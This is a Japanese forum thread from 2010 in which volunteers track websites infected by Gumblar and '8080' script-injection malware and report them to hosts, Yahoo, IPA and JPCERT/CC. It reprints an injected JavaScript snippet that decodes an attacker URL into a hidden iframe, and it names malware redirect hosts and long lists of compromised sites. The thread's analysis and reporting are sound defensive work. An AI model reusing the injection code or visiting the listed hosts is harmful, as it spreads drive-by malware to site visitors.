ていう利用頻度なもので、ネットにもあまり繋がないのでセキュリティ
アップデートかけるチャンスもなかなかないんです。
それでいていざ講習会が始まると、週一でネットには繋ぐけど
講習の準備と撤収作業が忙しくてアップデートどころじゃなくなっちゃうんで
かえって危ないです。
313:あんちたった ◆MOTO.0SDfQ
10/05/30 00:59:43
TTP://www●aoisys●com/nonstyle/
314:名無しさん@お腹いっぱい。
10/05/30 01:28:40
帰省キタ━━━(゚∀゚)━━━ !!!!!
315:名無しさん@お腹いっぱい。
10/05/30 01:38:32
www●cheesecake●co.jp/cp/2010present05/
ヤフー懸賞経由で応募しようとリンク踏んだらノートン先生の警告でた。
さらに、aguseで、「Gumblarの可能性あり」と出てたから、ヤフーと懸賞主催者に伝えたけど、両者から感染してないわボケと言われたけど、感染してるよね?
316:名無しさん@お腹いっぱい。
10/05/30 01:46:20
>>315
site.jsとかやられてるっち。
317:あんちたった ◆MOTO.0SDfQ
10/05/30 02:19:47
ちょwwwヤフーまでそんなこと言ってんの?
もしかしてHTMLしかみてないの?
318:名無しさん@お腹いっぱい。
10/05/30 02:40:22
なかなかやるものだなaguse
319:名無しさん@お腹いっぱい。
10/05/30 02:41:35
>>315
これどこにあるの?
320:あんちたった ◆MOTO.0SDfQ
10/05/30 02:46:58
>>319
>>316に書かれてるファイルを探せ。
んで、そのファイルの一番後ろ見ろ。
321:名無しさん@お腹いっぱい。
10/05/30 03:17:08
>>315
ボケまで言わないだろw
また電話して録音してみれば?
URLリンク(jsunpack.jeek.org)
322:316
10/05/30 03:42:15
該当サイトにフォームから戸津
鯖缶にもフォームから戸津
やほにもフォームから戸津
ついでにめるぽ
>>315が事実なら由々しき事態。
っと言いたいけど、jsファイルのみの感染の場合(ほかにもあるかもしんないけどー)
結構見逃されがちでこちらから指摘しないと対応されないぽ。。。
323:316
10/05/30 04:42:53
んでついでにVT通して送った検体だけど
かすぺは既に対応済みのこと。
> - HEUR:Trojan-Downloader.Script.Generic
> This files are already detected. Please update your bases.
VTのタイムラグか。。。orz......
ごめんよ、ひげおぢさん。
324:315
10/05/30 08:32:37
315
ごめん。ボケとまでは言われてないです。
ヤフーは、担当者に報告し検証した後、対処すると言われて2週間過ぎましたが、未だに応募可能たし、ウイルス感染無しと判断したんだなと。
懸賞主催者は、調べましたが、ウイルスに感染してません。ウイルスが蔓延してますので、チェックを2重にして気をつけると言われました。
なので、もう、シラネと思ってましたが、このスレ見て一応、このスレを読んでる人だけには報告しておこうと書き込みました。
325:名無しさん@お腹いっぱい。
10/05/30 09:48:17
このサイトのホスティングの「TSUKAERUNET」に通報すればよかったのに。
対応はいいホスティング会社なので、それらばもう止まってたかも
326:名無しさん@お腹いっぱい。
10/05/30 10:10:35
↓直接このURL送っておけば対応はやかったかもな。
URLリンク(www)●cheesecake●co●jp/user_data/packages/org/js/site●js
327:名無しさん@お腹いっぱい。
10/05/30 10:22:28
>>315-316
これ、感染が結構古くない? Wepawetに投げてみたけど、こういう結果だった。
URLリンク(wepawet.iseclab.org)
確かに感染しているんだけど、既に8080のマルウェア配布先が死んでる。(※)
なんで、悪意のある、感染させる方としてはとっくにyahooは用済み状態。
これ、yahooの感染~マルウェア配布鯖停止まで気がつかれなかったとしたら、かなりヤバイ。
(※) Wepawerの解析結果で、Requestsの所の、URLリンク(gothguilt)●ru:8080/google●com/espn●go●com/qip●ru●php
がマルウェアの配布元。 ここにアクセスに行くんだけど、既にStatus = Errorの通り、何も起きない。
私の方もVirtualPC使って無防備で踏んでみたけど、“今は” やっぱり何も落ちてこなかった。 現状無害だけど、どれだけ被害出たんだろう...orz
328:327
10/05/30 10:28:32
>>327
ちなみに、site.jsのVT結果。誰かが最近投げたばかりなので、そのまま引用。
URLリンク(www.virustotal.com)
現時点でも検出 5/41とか...終わったねぇ。orz NortonとKasperskyはヒューリスティックで検出するみたいだけど、その他はどうなっている事やら。
329:327
10/05/30 10:33:37
>>315,327
あ、スマン。Yahooが感染していたんじゃなくて、Yahooの懸賞の所に、感染したサイトがリンクされてたのか。
感染していたのは cheesecake●co●jp の方ですね。スミマセン
330:名無しさん@お腹いっぱい。
10/05/30 10:47:56
>>327
[Trend Micro Security Blog]から引用
URLリンク(blog.trendmicro.co.jp)
>3 不正スクリプトによる不正サイトへの接続は、同じIPアドレスからは初回接続時(または初回接続後のわずかな時間)しか本来の(不正な)応答がされない。
=>マルウェアサンプルの入手が困難になる。
IPアドレス以外に時間などで制御する可能性もありますし、まだ有害かもしれません
331:名無しさん@お腹いっぱい。
10/05/30 11:21:03
cheesecake●co●jpのサイト運営は、実質ここみたい
有限会社みのりや
www●minoriya●co●jp/result/
ここが大丈夫ですって言っているのでしょうね
332:名無しさん@お腹いっぱい。
10/05/30 11:21:49
>>315
user_data/packages/org/js/css.js infected with JS.Redirector.based.3
user_data/packages/org/js/navi.js infected with JS.Redirector.based.3
user_data/packages/org/js/win_op.js infected with JS.Redirector.based.3
user_data/packages/org/js/itembox.js infected with JS.Redirector.based.3
user_data/packages/org/js/site.js infected with JS.Redirector.based.3
メル凸済み、反応待ち
333:327
10/05/30 11:22:33
>>330
ん~、確かに私がアクセス制御に引っかかった可能性はあるね。
とりあえず、流れをみるとサイト管理者の対応が糞らしいので、IE8のSmartScreenと、Firefox経由でGoogleSafeBlowsingに通報しておいた。
このまま放置されていれば、多分、数日中には赤くなるはず。 管理者は逆に青くなると思うが。(苦笑
334:316
10/05/30 11:38:41
>>332は
Last-Modified: Thu, 13 May 2010 11:14:38 GMT
Last-Modified: Thu, 13 May 2010 11:17:39 GMT
Last-Modified: Thu, 13 May 2010 11:18:05 GMT
Last-Modified: Thu, 13 May 2010 11:16:35 GMT
Last-Modified: Thu, 13 May 2010 11:17:49 GMT
>>324
> 2週間過ぎました
やほーは音沙汰無しでぷか。。。
335:八頭 ◆YAGApwSaEw
10/05/30 11:48:35
直通なんてやめて
K察庁経由で伝えてもらえ
336:コテハン ◆8080adndqg
10/05/30 11:59:26
一件だけ投下しとくにゃ
【陥落サイトのURL悪用厳禁】
adajo●namidaame●com
凸してくれてる人>乙です orz
337:名無しさん@お腹いっぱい。
10/05/30 13:54:27
>>280
ここって宗教団体のようですね
URLリンク(www)<)
338:名無しさん@お腹いっぱい。
10/05/30 14:19:30
そういやyahooの占いのページが以前やられていたな
今回はyahooのトップページを開く分には大丈夫なんだろ?
339:名無しさん@お腹いっぱい。
10/05/30 14:53:27
>>337
googleは既に赤くなってる。
URLリンク(safebrowsing.clients.google.com)
早く対応しないから...w
>>338
問題ない。懸賞のページから、>315のリンク先に飛ぶとアウトだったらしい。
340:コテハン ◆8080adndqg
10/05/30 18:33:32
【陥落サイトのURL悪用厳禁】
www●ooraka●com/
<TITLE>パソコン在宅ワーク・常識を超えたパソコン在宅ワーク!</TITLE>
マルウェアが勝手に仕事をしてくれるのが「常識を超えた」ということでしょうかネ?
以下、どーでも良いようなカスサイト
canyonhardware●com/
maillady●hirotu●net/
www●kireibast●sakura●ne●jp/exlwckaj
341:名無しさん@お腹いっぱい。
10/05/30 20:13:48
>>340
www●ooraka●com/
メル凸済み、反応待ち
カスサイトやらは後でまとめてJPCERT/CCに通報しときます
ちょっと仕事が立て込んでるので
342:あんちたった ◆MOTO.0SDfQ
10/05/30 20:26:09
>>326
その書き込みの時点で既に実行済み
343:名無しさん@お腹いっぱい。
10/05/31 01:13:25
www●pflaster●co●jp :Forbidden
d-pic●net :Forbidden
cgi●members●interq●or●jp/aquamarine/ruvi/ :Forbidden
www●garden-bank●com :aguse、Gred、Dr.Webともに反応せず
cowgirl●jp :閉鎖?
www●barakai●com :aguse、Gred、Dr.Webともに反応せず
www●allety●net :閉鎖?
ソース確認してません、暇してるよって方は精査して頂けると助かります
他はまだ駄目みたいなので明日にでも再凸…
>>340
カスサイトとやらをまとめてJPCERT/CCに報告しておきました
ていうかこれ、いつ終息するんでしょorz
344:名無しさん@お腹いっぱい。
10/05/31 01:18:56
>>343追記
「Forbidden」はaguseGWで確認してます
345:コテハン ◆8080adndqg
10/05/31 11:55:44
>>341,343 乙です~
【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再・・・晒し)
www●hdta●jp ←絶賛放置中
ayako●h00●jp ←うんこ対応中 ※<!--<script>-->
www●jyoho-review●jp/link/ ←絶賛放置中
www●jyoho-review●jp/item_list/ ←(゚д゚;)
d-pic●net/ ←トップページのみ閉鎖
d-pic●net/以下の階層は絶賛公開中
↓
www●google●co●jp/search?hl=ja&source=hp&q=site%3Ad-pic●net%2F
fps01●plala●or●jp/~zeiken/ ←絶賛放置中
neta-script●lionking●jp/2007/08/ ←絶賛放置中
346:コテハン ◆8080adndqg
10/05/31 12:28:32
【陥落サイトのURL悪用厳禁】
www●spiceheads.com/index●html
↓
最下部の8080以外に
<body link="#DB0000"~中略~<script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70・・・
↓
79●135●152●181/stats/go●php?sid=1
※直接踏んだらGoogleに飛ばされて終了orz
この前の<ijbwjuics src=←の後継かな?
347:名無しさん@お腹いっぱい。
10/05/31 12:38:43
・レジナからwww●j-sports●or●jpへウイルスを駆除する様に伝えたとの連絡あり(まだ感染中…)
・つかえるネットからwww●cheesecake●co●jpのサービスを停止しましたとの連絡あり
www●i-keiei●jp :Forbidden
fps01●plala●or●jp/~zeiken :Forbidden
残りはもうしばらく静観
カスサイト、駄目くさいですがどうしたもんでしょう…
348:名無しさん@お腹いっぱい。
10/05/31 14:02:39
>>346
いつもお世話さん
…なんだが、【陥落サイトのURL悪用厳禁】 って書くから悪用するヤツが増えるんじゃないか?
どうせ悪意のあるヤツは書いてもやるだろうし
それに「危険」って書いてあるボタンを押したくなるの法則
349:名無しさん@お腹いっぱい。
10/05/31 14:48:29
> IPAセキュリティセンターです。
> ご連絡、ありがとうございます。
> 当機構でも当該サイトの改ざんを確認しました。
> 改ざんが確認できたサイトの管理者宛てに、サイトが改ざんされている
> 旨の通告をしておきます。
2時間で返事が来たよ…仕事早いな
>>345
お疲れ様です
カスペルスキーがIflamerで検出、ついでにAviraに検体提出
>>346
さくらに通報しようと思ったらメルフォで蹴られた…何故に
他のは後でまとめて見ておきます
>>348
はずせないんじゃない?
過去にいちゃもんつけられてるし
350:名無しさん@お腹いっぱい。
10/05/31 15:13:10
取扱注意
www●rokudai-ouen●com
351:名無しさん@お腹いっぱい。
10/05/31 15:28:03
>>350
Last-Modified: Thu, 20 May 2010 02:42:03 GMT
352:名無しさん@お腹いっぱい。
10/05/31 17:37:11
URLリンク(www)●geocities●jp/tentacles344/hodokyo●html
Gumblar.Xぽい
353:名無しさん@お腹いっぱい。
10/05/31 17:51:16
www●spiceheads●com :Forbidden
www●ooraka●com :Forbidden
www●itofound●or●jp :aguse、Gred、Dr.Webともに反応なし/精査よろ
www●rokudai-ouen●com :Forbidden
354:名無しさん@お腹いっぱい。
10/05/31 17:53:07
www●m-ouen●com :Forbidden
355:名無しさん@お腹いっぱい。
10/05/31 17:55:36
>>352
Gumblar.x確認
exeter-relatives-forum●org●uk/images/hnx5v/gifimg●php
↓
mariosflyingpizzaclearlake●com/images/appetizers●php
↓
latifkm●com/Css/templet11●php
↓
sexfunbeach●com/blogs/moms/wp-content/plugins/index●php
↓
asgardr●fr/memo/robots●php
↓
以後追跡不能
現時点では無害だけど、つーほーしたほうが良いと思う
356:名無しさん@お腹いっぱい。
10/05/31 19:36:18
Gumblar.Xは既に日本を蹴ってるんじゃなかったっけ
357:316
10/05/31 20:27:25
>>356
踏み台は結構あるよ。
358:名無しさん@お腹いっぱい。
10/05/31 20:54:21
>>345
>www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再・・・晒し)
NTTPCコミュニケーションズに電凸
折り返しの電話があり、対応する旨の話しでした
359:コテハン ◆8080adndqg
10/05/31 21:09:32
>>347,349 乙乙
--
>>346に投下したspiceheads●comに装填されていた8080以外のコード
()<>/.,’”; ←を全角にしてありまつ
<script type=’text/javascript’>str=”<vdepognbt src=” + unescape
(’%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31’)
+ ” Oaoz5=’1’vxoq5=’1’>”;str = str.replace(’vde’, ’i’);str =str.replace(’pog’, ’fr’);
str = str.replace(’nbt’, ’ame’);str =str.replace(’Oaoz5’, ’width’);
str =str.replace(’vxoq5’,’height’);document.write(str);</script>
--
microlines●lvって・・・
360:名無しさん@お腹いっぱい。
10/05/31 22:42:35
lv…ラトビアか。zlkon(gumblarの始祖)を思い出す。
361:名無しさん@お腹いっぱい。
10/05/31 22:50:28
>>360
.MSも見たな。
マイクロソフト…
362:名無しさん@お腹いっぱい。
10/05/31 23:10:43
>>359のコードなら難読化って程じゃないですよね
パーセントエンコードしたURLをデコード、「vdepognbt」を分割してreplaceで「iframe」に置換
今までのとは違う人が書いた物みたい
ガンブラーサイトを間貸ししてるのかも
363:名無しさん@お腹いっぱい。
10/05/31 23:27:46
カスペが見逃すやつをavastがことごとく遮断
優秀すぎる
364:名無しさん@お腹いっぱい。
10/05/31 23:43:39
Avira、AVG、MSEは論外・・・なのか?
365:名無しさん@お腹いっぱい。
10/05/31 23:50:39
virustotalで調べたが、上記のサイトでavastはほぼ完璧
MSE、AVIRAはちょっと検出、AVGは反応なしorz
変なサイトに飛ばされて、ウイルス仕込まれそうになった段階で反応するのかもしれないけど
366:327
10/05/31 23:53:36
>>315
感染したスクリプト撤去されたな。 感染コード長期間放置してたのに、何の告知も無しで。
結局、世の中こんな企業ばっかりか。
367:名無しさん@お腹いっぱい。
10/06/01 00:15:05
既出で今スクリプトが埋まってるURL
-8080系
ama●minasan●info/
anime●len2●net/
bentominowa●web●fc2●com/index_files/kotypeb_data/injection_graph_func●js
canyonhardware●com/
hirotu●net/hs/kyujin/maillady/index●htm
infom●biz/secretdiet/
kadaru●mydns●to/ →「ページを表示できないっぽいです(^^;」とあるが、ソースの下の方にスクリプト有り
kadaru●mydns●to/tauchi-office/taikensyugi/
kagaden●com/reiai/
kei●keita-house●com/torabaayu_kansai/
kumarin●biz/
neta-script●lionking●jp/2007/08/
nihon-support●jp/
population-japan●com
san●ron5●com/gbl/
temp●crossmarin●net/include/xoops●js
tenga●s155●coreserver●jp/
thismonky●com/
tw13●net
tw13●net/scratch/
tw13●net/vogue/vogue/index●html
www●adwalk●co●jp/
www●amakusaturigu●com
www●any-news●biz/
www●aoisys●com/nonstyle/
www●asu-job●com/
www●biz-x●jp
www●crossmarin●net/include/xoops●js
368:名無しさん@お腹いっぱい。
10/06/01 00:16:04
www●ftagent●jp/
www●gocha-mix●net/cgi-bin/blog/
www●hd-cre●com/ab-tz/
www●j-sports●or●jp
www●jc-consulting●jp/houkoku_m/index3●html
www●k3●dion●ne●jp/~sym1909/
www●k3●dion●ne●jp/~sym1909/hpbmapscript3●js
www●kireibast●sakura●ne●jp/exlwckaj/
www●marbell●jp/img2/photo/tenonaru/index●html
www●mfreep●com
www●nas-server●info/
www●ne●jp/asahi/sanya/sanpo
www●niaufuku●com/
www●niaufuku●com/sense_up/index●htm
www●nittoka●com/ →ソースの中央付近
www●oc-academy●com/taiken/wind●js
www●pommerland-herb●com/
www●ryu1●co●jp/
www●shinnippo●co●jp/ssff/2006hiroshima/
www●tec●ne●jp/
www●toutyann●com/
www●tu-han4●com/hatumo/
www●wood-sadoh●co●jp/classroom/index●html
www●y2-kco●com/bb-kn/
www12●plala●or●jp/atakashi/sk/
www13●plala●or●jp/metal-militia/
adajo●namidaame●com/ →途中で切れてる
nakaya-world●com/modules/bulletin →途中で切れてる
tukaoh●com →途中で切れてる
www●3ku●jp/grow_images/2005/june/index_2005june●html →途中で切れてる
369:名無しさん@お腹いっぱい。
10/06/01 00:17:04
www●granship●com/index●html →途中で切れてる
www●hdta●jp →途中で切れてる
www●seibidou●jp/products/information_sign/index●html →途中で切れてる
ayako●h00●jp →コメントアウト
butuda●f00●jp →コメントアウト
otokudou●h01●jp/ →コメントアウト
sunrise●2pg●in/ →コメントアウト
-Gumblar.x
ama●koukuujinja●net/vuitton/
doit●itabashido●com/seki/
jamur●jp/
mag●rdy●jp/
plot-office●com/
s1●shard●jp/syozyonudo/
saicho●co●jp/
truth-co●jp/
www●geocities●jp/tentacles344/hodokyo●html
www●kiyasuisan●co●jp/
-その他
winbet●tonosama●jp/
www●acl-music●jp/
www●aquaview●jp/
www●aquaview●jp/m_shop/index●html
www●aquaview●jp/q_a/index●html
www●ed-shop●com/
www●militarize●org/01●htm →ソースの最終行?
www●rctank●jp/ →ソースの最終行?
370:名無しさん@お腹いっぱい。
10/06/01 00:23:09
削除されただけでも、ましだぜ。未だに、絶賛放置中のサイトもあるぐらいだし
315のサイトは、企画、運営が外注だろ。よくこれで、運営してるなと。
Yahooも、自前の懸賞の所に、感染したサイトがリンクされていても放置するのに、フィッシング対策にYahooツールバーを入れよう!と宣伝してるのは笑うわ。
371:名無しさん@お腹いっぱい。
10/06/01 00:31:50
>>362
普通すぎるから激しい難読化より気付き難い(かもしれない)
372:コテハン ◆8080adndqg
10/06/01 00:33:22
>>367-369
373:コテハン ◆8080adndqg
10/06/01 00:38:40
>>372みすった orz
--
>>367-369 まとめ乙です。
>>358 乙です。
so-netさんが4連発w
止まらぬサイト改ざん(1) ISPがガンブラー対策~パスワードリセット敢行も
URLリンク(www.so-net.ne.jp)
止まらぬサイト改ざん(2)「怪しい薬局」に続き「怪しい時計屋キャンペーン」も
URLリンク(www.so-net.ne.jp)
止まらぬサイト改ざん(3)「負の連鎖」を断ち切る「3つの基本対策」実施を
URLリンク(www.so-net.ne.jp)
止まらぬサイト改ざん(4)訪問の心あたりはありませんか~新規告知サイト13件
URLリンク(www.so-net.ne.jp)
サイト復旧後、「告知無し」のカスサイトを晒すスレが必要かな?